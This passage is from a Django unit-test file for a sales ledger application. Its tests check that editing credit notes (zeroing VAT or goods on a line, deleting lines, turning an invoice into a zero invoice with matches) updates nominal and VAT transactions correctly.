edited_vat_nom_tran.nominal,
self.vat_nominal
)
self.assertEqual(
edited_vat_nom_tran.field,
"v"
)
edited_total_nom_tran = nom_trans[-1]
self.assertEqual(
edited_total_nom_tran.value,
-20
)
self.assertEqual(
edited_total_nom_tran.nominal,
self.sale_control
)
self.assertEqual(
edited_total_nom_tran.field,
"t"
)
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
0
)
total = 0
for tran in nom_trans:
total = total + tran.value
self.assertEqual(
total,
0
)
for i, vat_tran in enumerate(vat_transactions):
self.assertEqual(
vat_tran.header,
header.pk
)
self.assertEqual(
vat_tran.line,
lines[i].pk
)
self.assertEqual(
vat_tran.module,
"SL"
)
self.assertEqual(
vat_tran.ref,
header.ref
)
self.assertEqual(
vat_tran.period,
header.period
)
self.assertEqual(
vat_tran.date,
header.date
)
self.assertEqual(
vat_tran.field,
"v"
)
self.assertEqual(
vat_tran.tran_type,
header.type
)
self.assertEqual(
vat_tran.vat_type,
"o"
)
self.assertEqual(
vat_tran.vat_code,
lines[i].vat_code
)
self.assertEqual(
vat_tran.vat_rate,
lines[i].vat_code.rate
)
self.assertEqual(
vat_tran.goods,
lines[i].goods
)
self.assertEqual(
vat_tran.vat,
lines[i].vat
)
self.assertEqual(
header.goods,
sum(vat_tran.goods for vat_tran in vat_transactions)
)
self.assertEqual(
header.vat,
sum(vat_tran.vat for vat_tran in vat_transactions)
)
# CORRECT USAGE
# Same as above except we now blank out vat and not goods
def test_vat_reduced_to_zero_but_goods_non_zero_on_a_line(self):
self.client.force_login(self.user)
create_credit_note_with_nom_entries(
{
"type": "sc",
"customer": self.customer,
"period": self.period,
"ref": self.ref,
"date": self.model_date,
"due_date": self.model_due_date,
"total": 2400,
"paid": 0,
"due": 2400,
"goods": 2000,
"vat": 400
},
[
{
'description': self.description,
'goods': 100,
'nominal': self.nominal,
'vat_code': self.vat_code,
'vat': 20
}
] * 20,
self.vat_nominal,
self.sale_control
)
headers = SaleHeader.objects.all().order_by("pk")
lines = SaleLine.objects.all().order_by("pk")
self.assertEqual(
len(lines),
20
)
create_vat_transactions(headers[0], lines)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
20
)
self.assertEqual(
len(headers),
1
)
self.assertEqual(
headers[0].total,
-2400
)
self.assertEqual(
headers[0].paid,
0
)
self.assertEqual(
headers[0].due,
-2400
)
nom_trans = NominalTransaction.objects.all()
self.assertEqual(
len(nom_trans),
20 + 20 + 20
)
nom_trans = sort_multiple(nom_trans, *[ (lambda n : n.pk, False) ])
header = headers[0]
for i, vat_tran in enumerate(vat_transactions):
self.assertEqual(
vat_tran.header,
header.pk
)
self.assertEqual(
vat_tran.line,
lines[i].pk
)
self.assertEqual(
vat_tran.module,
"SL"
)
self.assertEqual(
vat_tran.ref,
header.ref
)
self.assertEqual(
vat_tran.period,
header.period
)
self.assertEqual(
vat_tran.date,
header.date
)
self.assertEqual(
vat_tran.field,
"v"
)
self.assertEqual(
vat_tran.tran_type,
header.type
)
self.assertEqual(
vat_tran.vat_type,
"o"
)
self.assertEqual(
vat_tran.vat_code,
lines[i].vat_code
)
self.assertEqual(
vat_tran.vat_rate,
lines[i].vat_code.rate
)
self.assertEqual(
vat_tran.goods,
lines[i].goods
)
self.assertEqual(
vat_tran.vat,
lines[i].vat
)
self.assertEqual(
header.goods,
sum(vat_tran.goods for vat_tran in vat_transactions)
)
self.assertEqual(
header.vat,
sum(vat_tran.vat for vat_tran in vat_transactions)
)
for i, line in enumerate(lines):
self.assertEqual(line.header, header)
self.assertEqual(line.line_no, i + 1)
self.assertEqual(line.description, self.description)
self.assertEqual(line.goods, -100)
self.assertEqual(line.nominal, self.nominal)
self.assertEqual(line.vat_code, self.vat_code)
self.assertEqual(line.vat, -20)
self.assertEqual(
line.goods_nominal_transaction,
nom_trans[ 3 * i ]
)
self.assertEqual(
line.vat_nominal_transaction,
nom_trans[ (3 * i) + 1 ]
)
self.assertEqual(
line.total_nominal_transaction,
nom_trans[ (3 * i) + 2 ]
)
self.assertEqual(
line.vat_transaction,
vat_transactions[i]
)
goods_nom_trans = nom_trans[::3]
vat_nom_trans = nom_trans[1::3]
total_nom_trans = nom_trans[2::3]
for i, tran in enumerate(goods_nom_trans):
self.assertEqual(
tran.value,
100
)
self.assertEqual(
tran.nominal,
self.nominal
)
self.assertEqual(
tran.field,
"g"
)
self.assertEqual(
lines[i].goods_nominal_transaction,
tran
)
for i, tran in enumerate(vat_nom_trans):
self.assertEqual(
tran.value,
20
)
self.assertEqual(
tran.nominal,
self.vat_nominal
)
self.assertEqual(
tran.field,
"v"
)
self.assertEqual(
lines[i].vat_nominal_transaction,
tran
)
for i, tran in enumerate(total_nom_trans):
self.assertEqual(
tran.value,
-120
)
self.assertEqual(
tran.nominal,
self.sale_control
)
self.assertEqual(
tran.field,
"t"
)
self.assertEqual(
lines[i].total_nominal_transaction,
tran
)
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
0
)
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": header.type,
"customer": header.customer.pk,
"period": header.period.pk,
"ref": header.ref,
"date": header.date.strftime(DATE_INPUT_FORMAT),
"due_date": header.due_date.strftime(DATE_INPUT_FORMAT),
"total": -1 * header.total - 20 # we set vat = 0 when previously was 20
}
)
data.update(header_data)
lines_as_dicts = [ to_dict(line) for line in lines ]
line_trans = [ get_fields(line, ['id', 'description', 'goods', 'nominal', 'vat_code', 'vat']) for line in lines_as_dicts ]
line_forms = line_trans
for form in line_forms:
form["goods"] *= -1
form["vat"] *= -1
line_forms[-1]["goods"] = 100
line_forms[-1]["vat"] = 0
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
line_data["line-INITIAL_FORMS"] = 20
data.update(line_data)
matching_data = create_formset_data(match_form_prefix, [])
data.update(matching_data)
url = reverse("sales:edit", kwargs={"pk": headers[0].pk})
response = self.client.post(url, data)
headers = SaleHeader.objects.all()
self.assertEqual(len(headers), 1)
self.assertEqual(
headers[0].total,
-2380
)
self.assertEqual(
headers[0].paid,
0
)
self.assertEqual(
headers[0].due,
-2380
)
nom_trans = NominalTransaction.objects.all()
nom_trans = sort_multiple(nom_trans, *[ (lambda n : n.pk, False) ])
self.assertEqual(
len(nom_trans),
20 + 19 + 20
# 19 goods nominal transactions
)
header = headers[0]
lines = (
SaleLine.objects
.select_related("vat_code")
.all()
.order_by("pk")
)
self.assertEqual(
len(lines),
20
)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
20
)
vat_transactions = list(vat_transactions)
lines = list(lines)
unedited_lines = list(lines)[:-1]
for i, line in enumerate(unedited_lines):
self.assertEqual(line.header, header)
self.assertEqual(line.line_no, i + 1)
self.assertEqual(line.description, self.description)
self.assertEqual(line.goods, -100)
self.assertEqual(line.nominal, self.nominal)
self.assertEqual(line.vat_code, self.vat_code)
self.assertEqual(line.vat, -20)
self.assertEqual(
line.goods_nominal_transaction,
nom_trans[ 3 * i ]
)
self.assertEqual(
line.vat_nominal_transaction,
nom_trans[ (3 * i) + 1 ]
)
self.assertEqual(
line.total_nominal_transaction,
nom_trans[ (3 * i) + 2 ]
)
self.assertEqual(
line.vat_transaction,
vat_transactions[i]
)
i = i + 1
edited_line = lines[-1]
self.assertEqual(edited_line.header, header)
self.assertEqual(edited_line.line_no, i + 1)
self.assertEqual(edited_line.description, self.description)
self.assertEqual(edited_line.goods, -100)
self.assertEqual(edited_line.nominal, self.nominal)
self.assertEqual(edited_line.vat_code, self.vat_code)
self.assertEqual(edited_line.vat, 0)
# NOMINAL TRANSACTION FOR GOODS IS REMOVED
self.assertEqual(
edited_line.goods_nominal_transaction,
nom_trans[ 57 ]
)
self.assertEqual(
edited_line.vat_nominal_transaction,
None
)
self.assertEqual(
edited_line.total_nominal_transaction,
nom_trans[ 58 ]
)
self.assertEqual(
edited_line.vat_transaction,
vat_transactions[-1]
)
goods_nom_trans = nom_trans[:-2:3]
vat_nom_trans = nom_trans[1:-2:3]
total_nom_trans = nom_trans[2:-2:3]
unedited_goods_nom_trans = goods_nom_trans
# CHECK OUR UNEDITED FIRST ARE INDEED UNEDITED
for tran in unedited_goods_nom_trans:
self.assertEqual(
tran.value,
100
)
self.assertEqual(
tran.nominal,
self.nominal
)
self.assertEqual(
tran.field,
"g"
)
unedited_vat_nom_trans = vat_nom_trans
for tran in unedited_vat_nom_trans:
self.assertEqual(
tran.value,
20
)
self.assertEqual(
tran.nominal,
self.vat_nominal
)
self.assertEqual(
tran.field,
"v"
)
unedited_total_nom_trans = total_nom_trans
for tran in unedited_total_nom_trans:
self.assertEqual(
tran.value,
-120
)
self.assertEqual(
tran.nominal,
self.sale_control
)
self.assertEqual(
tran.field,
"t"
)
# NOW CHECK THE EDITED
edited_goods_nom_tran = nom_trans[-2]
self.assertEqual(
edited_goods_nom_tran.value,
100
)
self.assertEqual(
edited_goods_nom_tran.nominal,
self.nominal
)
self.assertEqual(
edited_goods_nom_tran.field,
"g"
)
edited_total_nom_tran = nom_trans[-1]
self.assertEqual(
edited_total_nom_tran.value,
-100
)
self.assertEqual(
edited_total_nom_tran.nominal,
self.sale_control
)
self.assertEqual(
edited_total_nom_tran.field,
"t"
)
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
0
)
total = 0
for tran in nom_trans:
total = total + tran.value
self.assertEqual(
total,
0
)
for i, vat_tran in enumerate(vat_transactions):
self.assertEqual(
vat_tran.header,
header.pk
)
self.assertEqual(
vat_tran.line,
lines[i].pk
)
self.assertEqual(
vat_tran.module,
"SL"
)
self.assertEqual(
vat_tran.ref,
header.ref
)
self.assertEqual(
vat_tran.period,
header.period
)
self.assertEqual(
vat_tran.date,
header.date
)
self.assertEqual(
vat_tran.field,
"v"
)
self.assertEqual(
vat_tran.tran_type,
header.type
)
self.assertEqual(
vat_tran.vat_type,
"o"
)
self.assertEqual(
vat_tran.vat_code,
lines[i].vat_code
)
self.assertEqual(
vat_tran.vat_rate,
lines[i].vat_code.rate
)
self.assertEqual(
vat_tran.goods,
lines[i].goods
)
self.assertEqual(
vat_tran.vat,
lines[i].vat
)
self.assertEqual(
header.goods,
sum(vat_tran.goods for vat_tran in vat_transactions)
)
self.assertEqual(
header.vat,
sum(vat_tran.vat for vat_tran in vat_transactions)
)
# CORRECT USAGE
# Zero out the goods and the vat
# We expect the line and the three nominal transactions to all be deleted
def test_goods_and_vat_for_line_reduced_to_zero(self):
self.client.force_login(self.user)
create_credit_note_with_nom_entries(
{
"type": "sc",
"customer": self.customer,
"period": self.period,
"ref": self.ref,
"date": self.model_date,
"due_date": self.model_due_date,
"total": 2400,
"paid": 0,
"due": 2400,
"goods": 2000,
"vat": 400
},
[
{
'description': self.description,
'goods': 100,
'nominal': self.nominal,
'vat_code': self.vat_code,
'vat': 20
}
] * 20,
self.vat_nominal,
self.sale_control
)
headers = SaleHeader.objects.all().order_by("pk")
lines = SaleLine.objects.all().order_by("pk")
self.assertEqual(
len(lines),
20
)
create_vat_transactions(headers[0], lines)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
20
)
self.assertEqual(
len(headers),
1
)
self.assertEqual(
headers[0].total,
-2400
)
self.assertEqual(
headers[0].paid,
0
)
self.assertEqual(
headers[0].due,
-2400
)
nom_trans = NominalTransaction.objects.all()
self.assertEqual(
len(nom_trans),
20 + 20 + 20
)
nom_trans = sort_multiple(nom_trans, *[ (lambda n : n.pk, False) ])
header = headers[0]
for i, vat_tran in enumerate(vat_transactions):
self.assertEqual(
vat_tran.header,
header.pk
)
self.assertEqual(
vat_tran.line,
lines[i].pk
)
self.assertEqual(
vat_tran.module,
"SL"
)
self.assertEqual(
vat_tran.ref,
header.ref
)
self.assertEqual(
vat_tran.period,
header.period
)
self.assertEqual(
vat_tran.date,
header.date
)
self.assertEqual(
vat_tran.field,
"v"
)
self.assertEqual(
vat_tran.tran_type,
header.type
)
self.assertEqual(
vat_tran.vat_type,
"o"
)
self.assertEqual(
vat_tran.vat_code,
lines[i].vat_code
)
self.assertEqual(
vat_tran.vat_rate,
lines[i].vat_code.rate
)
self.assertEqual(
vat_tran.goods,
lines[i].goods
)
self.assertEqual(
vat_tran.vat,
lines[i].vat
)
self.assertEqual(
header.goods,
sum(vat_tran.goods for vat_tran in vat_transactions)
)
self.assertEqual(
header.vat,
sum(vat_tran.vat for vat_tran in vat_transactions)
)
for i, line in enumerate(lines):
self.assertEqual(line.header, header)
self.assertEqual(line.line_no, i + 1)
self.assertEqual(line.description, self.description)
self.assertEqual(line.goods, -100)
self.assertEqual(line.nominal, self.nominal)
self.assertEqual(line.vat_code, self.vat_code)
self.assertEqual(line.vat, -20)
self.assertEqual(
line.goods_nominal_transaction,
nom_trans[ 3 * i ]
)
self.assertEqual(
line.vat_nominal_transaction,
nom_trans[ (3 * i) + 1 ]
)
self.assertEqual(
line.total_nominal_transaction,
nom_trans[ (3 * i) + 2 ]
)
self.assertEqual(
line.vat_transaction,
vat_transactions[i]
)
goods_nom_trans = nom_trans[::3]
vat_nom_trans = nom_trans[1::3]
total_nom_trans = nom_trans[2::3]
for i, tran in enumerate(goods_nom_trans):
self.assertEqual(
tran.value,
100
)
self.assertEqual(
tran.nominal,
self.nominal
)
self.assertEqual(
tran.field,
"g"
)
self.assertEqual(
lines[i].goods_nominal_transaction,
tran
)
for i, tran in enumerate(vat_nom_trans):
self.assertEqual(
tran.value,
20
)
self.assertEqual(
tran.nominal,
self.vat_nominal
)
self.assertEqual(
tran.field,
"v"
)
self.assertEqual(
lines[i].vat_nominal_transaction,
tran
)
for i, tran in enumerate(total_nom_trans):
self.assertEqual(
tran.value,
-120
)
self.assertEqual(
tran.nominal,
self.sale_control
)
self.assertEqual(
tran.field,
"t"
)
self.assertEqual(
lines[i].total_nominal_transaction,
tran
)
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
0
)
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": header.type,
"customer": header.customer.pk,
"period": header.period.pk,
"ref": header.ref,
"date": header.date.strftime(DATE_INPUT_FORMAT),
"due_date": header.due_date.strftime(DATE_INPUT_FORMAT),
"total": -1 * header.total - 120 # we set vat = 0 when previously was 20
}
)
data.update(header_data)
lines_as_dicts = [ to_dict(line) for line in lines ]
line_trans = [ get_fields(line, ['id', 'description', 'goods', 'nominal', 'vat_code', 'vat']) for line in lines_as_dicts ]
line_forms = line_trans
for form in line_forms:
form["goods"] *= -1
form["vat"] *= -1
line_forms[-1]["goods"] = 0
line_forms[-1]["vat"] = 0
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
line_data["line-INITIAL_FORMS"] = 20
data.update(line_data)
matching_data = create_formset_data(match_form_prefix, [])
data.update(matching_data)
url = reverse("sales:edit", kwargs={"pk": headers[0].pk})
response = self.client.post(url, data)
self.assertEqual(
response.status_code,
200
)
self.assertContains(
response,
'<li class="py-1">Goods and Vat cannot both be zero.</li>',
html=True
)
# CORRECT USAGE
# SIMPLY MARK A LINE AS DELETED
def test_line_marked_as_deleted_has_line_and_nominals_removed(self):
self.client.force_login(self.user)
create_credit_note_with_nom_entries(
{
"type": "sc",
"customer": self.customer,
"period": self.period,
"ref": self.ref,
"date": self.model_date,
"due_date": self.model_due_date,
"total": 2400,
"paid": 0,
"due": 2400,
"goods": 2000,
"vat": 400
},
[
{
'description': self.description,
'goods': 100,
'nominal': self.nominal,
'vat_code': self.vat_code,
'vat': 20
}
] * 20,
self.vat_nominal,
self.sale_control
)
headers = SaleHeader.objects.all().order_by("pk")
lines = SaleLine.objects.all().order_by("pk")
self.assertEqual(
len(lines),
20
)
create_vat_transactions(headers[0], lines)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
20
)
self.assertEqual(
len(headers),
1
)
self.assertEqual(
headers[0].total,
-2400
)
self.assertEqual(
headers[0].paid,
0
)
self.assertEqual(
headers[0].due,
-2400
)
nom_trans = NominalTransaction.objects.all()
self.assertEqual(
len(nom_trans),
20 + 20 + 20
)
nom_trans = sort_multiple(nom_trans, *[ (lambda n : n.pk, False) ])
header = headers[0]
for i, vat_tran in enumerate(vat_transactions):
self.assertEqual(
vat_tran.header,
header.pk
)
self.assertEqual(
vat_tran.line,
lines[i].pk
)
self.assertEqual(
vat_tran.module,
"SL"
)
self.assertEqual(
vat_tran.ref,
header.ref
)
self.assertEqual(
vat_tran.period,
header.period
)
self.assertEqual(
vat_tran.date,
header.date
)
self.assertEqual(
vat_tran.field,
"v"
)
self.assertEqual(
vat_tran.tran_type,
header.type
)
self.assertEqual(
vat_tran.vat_type,
"o"
)
self.assertEqual(
vat_tran.vat_code,
lines[i].vat_code
)
self.assertEqual(
vat_tran.vat_rate,
lines[i].vat_code.rate
)
self.assertEqual(
vat_tran.goods,
lines[i].goods
)
self.assertEqual(
vat_tran.vat,
lines[i].vat
)
self.assertEqual(
header.goods,
sum(vat_tran.goods for vat_tran in vat_transactions)
)
self.assertEqual(
header.vat,
sum(vat_tran.vat for vat_tran in vat_transactions)
)
for i, line in enumerate(lines):
self.assertEqual(line.header, header)
self.assertEqual(line.line_no, i + 1)
self.assertEqual(line.description, self.description)
self.assertEqual(line.goods, -100)
self.assertEqual(line.nominal, self.nominal)
self.assertEqual(line.vat_code, self.vat_code)
self.assertEqual(line.vat, -20)
self.assertEqual(
line.goods_nominal_transaction,
nom_trans[ 3 * i ]
)
self.assertEqual(
line.vat_nominal_transaction,
nom_trans[ (3 * i) + 1 ]
)
self.assertEqual(
line.total_nominal_transaction,
nom_trans[ (3 * i) + 2 ]
)
self.assertEqual(
line.vat_transaction,
vat_transactions[i]
)
goods_nom_trans = nom_trans[::3]
vat_nom_trans = nom_trans[1::3]
total_nom_trans = nom_trans[2::3]
for i, tran in enumerate(goods_nom_trans):
self.assertEqual(
tran.value,
100
)
self.assertEqual(
tran.nominal,
self.nominal
)
self.assertEqual(
tran.field,
"g"
)
self.assertEqual(
lines[i].goods_nominal_transaction,
tran
)
for i, tran in enumerate(vat_nom_trans):
self.assertEqual(
tran.value,
20
)
self.assertEqual(
tran.nominal,
self.vat_nominal
)
self.assertEqual(
tran.field,
"v"
)
self.assertEqual(
lines[i].vat_nominal_transaction,
tran
)
for i, tran in enumerate(total_nom_trans):
self.assertEqual(
tran.value,
-120
)
self.assertEqual(
tran.nominal,
self.sale_control
)
self.assertEqual(
tran.field,
"t"
)
self.assertEqual(
lines[i].total_nominal_transaction,
tran
)
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
0
)
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": header.type,
"customer": header.customer.pk,
"period": header.period.pk,
"ref": header.ref,
"date": header.date.strftime(DATE_INPUT_FORMAT),
"due_date": header.due_date.strftime(DATE_INPUT_FORMAT),
"total": -1 * header.total - 120 # we set vat = 0 when previously was 20
}
)
data.update(header_data)
lines_as_dicts = [ to_dict(line) for line in lines ]
line_trans = [ get_fields(line, ['id', 'description', 'goods', 'nominal', 'vat_code', 'vat']) for line in lines_as_dicts ]
line_forms = line_trans
for form in line_forms:
form["goods"] *= -1
form["vat"] *= -1
line_forms[-1]["goods"] = 100
line_forms[-1]["vat"] = 20
line_forms[-1]["DELETE"] = "yes"
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
line_data["line-INITIAL_FORMS"] = 20
data.update(line_data)
matching_data = create_formset_data(match_form_prefix, [])
data.update(matching_data)
url = reverse("sales:edit", kwargs={"pk": headers[0].pk})
response = self.client.post(url, data)
headers = SaleHeader.objects.all()
self.assertEqual(len(headers), 1)
self.assertEqual(
headers[0].total,
-2280
)
self.assertEqual(
headers[0].paid,
0
)
self.assertEqual(
headers[0].due,
-2280
)
nom_trans = NominalTransaction.objects.all()
nom_trans = sort_multiple(nom_trans, *[ (lambda n : n.pk, False) ])
self.assertEqual(
len(nom_trans),
19 + 19 + 19
)
header = headers[0]
lines = (
SaleLine.objects
.select_related("vat_code")
.all()
.order_by("pk")
)
self.assertEqual(
len(lines),
19
)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
19
)
vat_transactions = list(vat_transactions)
lines = list(lines)
unedited_lines = list(lines)[:-1]
for i, line in enumerate(unedited_lines):
self.assertEqual(line.header, header)
self.assertEqual(line.line_no , i + 1)
self.assertEqual(line.description, self.description)
self.assertEqual(line.goods, -100)
self.assertEqual(line.nominal, self.nominal)
self.assertEqual(line.vat_code, self.vat_code)
self.assertEqual(line.vat, -20)
self.assertEqual(
line.goods_nominal_transaction,
nom_trans[ 3 * i ]
)
self.assertEqual(
line.vat_nominal_transaction,
nom_trans[ (3 * i) + 1 ]
)
self.assertEqual(
line.total_nominal_transaction,
nom_trans[ (3 * i) + 2 ]
)
self.assertEqual(
line.vat_transaction,
vat_transactions[i]
)
goods_nom_trans = nom_trans[::3]
vat_nom_trans = nom_trans[1::3]
total_nom_trans = nom_trans[2::3]
unedited_goods_nom_trans = goods_nom_trans
# CHECK OUR UNEDITED FIRST ARE INDEED UNEDITED
for tran in unedited_goods_nom_trans:
self.assertEqual(
tran.value,
100
)
self.assertEqual(
tran.nominal,
self.nominal
)
self.assertEqual(
tran.field,
"g"
)
unedited_vat_nom_trans = vat_nom_trans
for tran in unedited_vat_nom_trans:
self.assertEqual(
tran.value,
20
)
self.assertEqual(
tran.nominal,
self.vat_nominal
)
self.assertEqual(
tran.field,
"v"
)
unedited_total_nom_trans = total_nom_trans
for tran in unedited_total_nom_trans:
self.assertEqual(
tran.value,
-120
)
self.assertEqual(
tran.nominal,
self.sale_control
)
self.assertEqual(
tran.field,
"t"
)
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
0
)
total = 0
for tran in nom_trans:
total = total + tran.value
self.assertEqual(
total,
0
)
for i, vat_tran in enumerate(vat_transactions):
self.assertEqual(
vat_tran.header,
header.pk
)
self.assertEqual(
vat_tran.line,
lines[i].pk
)
self.assertEqual(
vat_tran.module,
"SL"
)
self.assertEqual(
vat_tran.ref,
header.ref
)
self.assertEqual(
vat_tran.period,
header.period
)
self.assertEqual(
vat_tran.date,
header.date
)
self.assertEqual(
vat_tran.field,
"v"
)
self.assertEqual(
vat_tran.tran_type,
header.type
)
self.assertEqual(
vat_tran.vat_type,
"o"
)
self.assertEqual(
vat_tran.vat_code,
lines[i].vat_code
)
self.assertEqual(
vat_tran.vat_rate,
lines[i].vat_code.rate
)
self.assertEqual(
vat_tran.goods,
lines[i].goods
)
self.assertEqual(
vat_tran.vat,
lines[i].vat
)
self.assertEqual(
header.goods,
sum(vat_tran.goods for vat_tran in vat_transactions)
)
self.assertEqual(
header.vat,
sum(vat_tran.vat for vat_tran in vat_transactions)
)
# CORRECT USAGE
# DELETE ALL THE LINES SO IT IS A ZERO INVOICE
def test_non_zero_invoice_is_changed_to_zero_invoice_by_deleting_all_lines(self):
self.client.force_login(self.user)
create_credit_note_with_nom_entries(
{
"type": "sc",
"customer": self.customer,
"period": self.period,
"ref": self.ref,
"date": self.model_date,
"due_date": self.model_due_date,
"total": 2400,
"paid": 0,
"due": 2400,
"goods": 2000,
"vat": 400
},
[
{
'description': self.description,
'goods': 100,
'nominal': self.nominal,
'vat_code': self.vat_code,
'vat': 20
}
] * 20,
self.vat_nominal,
self.sale_control
)
headers = SaleHeader.objects.all().order_by("pk")
lines = SaleLine.objects.all().order_by("pk")
self.assertEqual(
len(lines),
20
)
create_vat_transactions(headers[0], lines)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
20
)
self.assertEqual(
len(headers),
1
)
self.assertEqual(
headers[0].total,
-2400
)
self.assertEqual(
headers[0].paid,
0
)
self.assertEqual(
headers[0].due,
-2400
)
nom_trans = NominalTransaction.objects.all()
self.assertEqual(
len(nom_trans),
20 + 20 + 20
)
nom_trans = sort_multiple(nom_trans, *[ (lambda n : n.pk, False) ])
header = headers[0]
for i, vat_tran in enumerate(vat_transactions):
self.assertEqual(
vat_tran.header,
header.pk
)
self.assertEqual(
vat_tran.line,
lines[i].pk
)
self.assertEqual(
vat_tran.module,
"SL"
)
self.assertEqual(
vat_tran.ref,
header.ref
)
self.assertEqual(
vat_tran.period,
header.period
)
self.assertEqual(
vat_tran.date,
header.date
)
self.assertEqual(
vat_tran.field,
"v"
)
self.assertEqual(
vat_tran.tran_type,
header.type
)
self.assertEqual(
vat_tran.vat_type,
"o"
)
self.assertEqual(
vat_tran.vat_code,
lines[i].vat_code
)
self.assertEqual(
vat_tran.vat_rate,
lines[i].vat_code.rate
)
self.assertEqual(
vat_tran.goods,
lines[i].goods
)
self.assertEqual(
vat_tran.vat,
lines[i].vat
)
self.assertEqual(
header.goods,
sum(vat_tran.goods for vat_tran in vat_transactions)
)
self.assertEqual(
header.vat,
sum(vat_tran.vat for vat_tran in vat_transactions)
)
for i, line in enumerate(lines):
self.assertEqual(line.line_no, i + 1)
self.assertEqual(line.header, header)
self.assertEqual(line.description, self.description)
self.assertEqual(line.goods, -100)
self.assertEqual(line.nominal, self.nominal)
self.assertEqual(line.vat_code, self.vat_code)
self.assertEqual(line.vat, -20)
self.assertEqual(
line.goods_nominal_transaction,
nom_trans[ 3 * i ]
)
self.assertEqual(
line.vat_nominal_transaction,
nom_trans[ (3 * i) + 1 ]
)
self.assertEqual(
line.total_nominal_transaction,
nom_trans[ (3 * i) + 2 ]
)
self.assertEqual(
line.vat_transaction,
vat_transactions[i]
)
goods_nom_trans = nom_trans[::3]
vat_nom_trans = nom_trans[1::3]
total_nom_trans = nom_trans[2::3]
for i, tran in enumerate(goods_nom_trans):
self.assertEqual(
tran.value,
100
)
self.assertEqual(
tran.nominal,
self.nominal
)
self.assertEqual(
tran.field,
"g"
)
self.assertEqual(
lines[i].goods_nominal_transaction,
tran
)
for i, tran in enumerate(vat_nom_trans):
self.assertEqual(
tran.value,
20
)
self.assertEqual(
tran.nominal,
self.vat_nominal
)
self.assertEqual(
tran.field,
"v"
)
self.assertEqual(
lines[i].vat_nominal_transaction,
tran
)
for i, tran in enumerate(total_nom_trans):
self.assertEqual(
tran.value,
-120
)
self.assertEqual(
tran.nominal,
self.sale_control
)
self.assertEqual(
tran.field,
"t"
)
self.assertEqual(
lines[i].total_nominal_transaction,
tran
)
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
0
)
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": header.type,
"customer": header.customer.pk,
"period": header.period.pk,
"ref": header.ref,
"date": header.date.strftime(DATE_INPUT_FORMAT),
"due_date": header.due_date.strftime(DATE_INPUT_FORMAT),
"total": 0
}
)
data.update(header_data)
lines_as_dicts = [ to_dict(line) for line in lines ]
line_trans = [ get_fields(line, ['id', 'description', 'goods', 'nominal', 'vat_code', 'vat']) for line in lines_as_dicts ]
line_forms = line_trans
for form in line_forms:
form["goods"] *= -1
form["vat"] *= -1
for form in line_forms:
form["DELETE"] = "yes"
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
line_data["line-INITIAL_FORMS"] = 20
data.update(line_data)
# WE HAVE TO MATCH OTHERWISE IT WILL ERROR
headers_to_match_against = create_cancelling_headers(2, self.customer, "match", "sc", -100, self.period)
headers_to_match_against_orig = headers_to_match_against
headers_as_dicts = [ to_dict(header) for header in headers_to_match_against ]
headers_to_match_against = [ get_fields(header, ['type', 'ref', 'total', 'paid', 'due', 'id']) for header in headers_as_dicts ]
matching_forms = []
matching_forms += add_and_replace_objects([headers_to_match_against[0]], {"id": "matched_to"}, {"value": 100})
matching_forms += add_and_replace_objects([headers_to_match_against[1]], {"id": "matched_to"}, {"value": -100})
matching_data = create_formset_data(match_form_prefix, matching_forms)
data.update(matching_data)
url = reverse("sales:edit", kwargs={"pk": headers[0].pk})
response = self.client.post(url, data)
headers = SaleHeader.objects.all().order_by("pk")
self.assertEqual(len(headers), 3)
self.assertEqual(
headers[0].total,
0
)
self.assertEqual(
headers[0].paid,
0
)
self.assertEqual(
headers[0].due,
0
)
nom_trans = NominalTransaction.objects.all()
nom_trans = sort_multiple(nom_trans, *[ (lambda n : n.pk, False) ])
self.assertEqual(
len(nom_trans),
0
)
header = headers[0]
lines = (
SaleLine.objects
.select_related("vat_code")
.all()
.order_by("pk")
)
self.assertEqual(
len(lines),
0
)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
0
)
vat_transactions = list(vat_transactions)
lines = list(lines)
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
2
)
self.assertEqual(
matches[0].matched_by,
headers[0]
)
self.assertEqual(
matches[0].matched_to,
headers[1]
)
self.assertEqual(
matches[0].value,
-100
)
self.assertEqual(
matches[1].matched_by,
headers[0]
)
self.assertEqual(
matches[1].matched_to,
headers[2]
)
self.assertEqual(
matches[1].value,
100
)
# CORRECT USAGE
def test_change_zero_invoice_to_a_non_zero_invoice(self):
self.client.force_login(self.user)
header = SaleHeader.objects.create(
**{
"type": "sc",
"customer": self.customer,
"period": self.period,
"period": self.period,
"ref": self.ref,
"date": self.model_date,
"due_date": self.model_due_date,
"goods": 0,
"vat": 0,
"total": 0,
"paid": 0,
"due": 0
}
)
headers_to_match_against = create_cancelling_headers(2, self.customer, "match", "sc", -100, self.period)
match(header, [ (headers_to_match_against[0], -100), (headers_to_match_against[1], 100) ] )
headers = SaleHeader.objects.all().order_by("pk")
self.assertEqual(
len(headers),
3
)
self.assertEqual(
headers[0].total,
0
)
self.assertEqual(
headers[0].paid,
0
)
self.assertEqual(
headers[0].due,
0
)
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
2
)
self.assertEqual(
matches[0].matched_by,
headers[0]
)
self.assertEqual(
matches[0].matched_to,
headers[1]
)
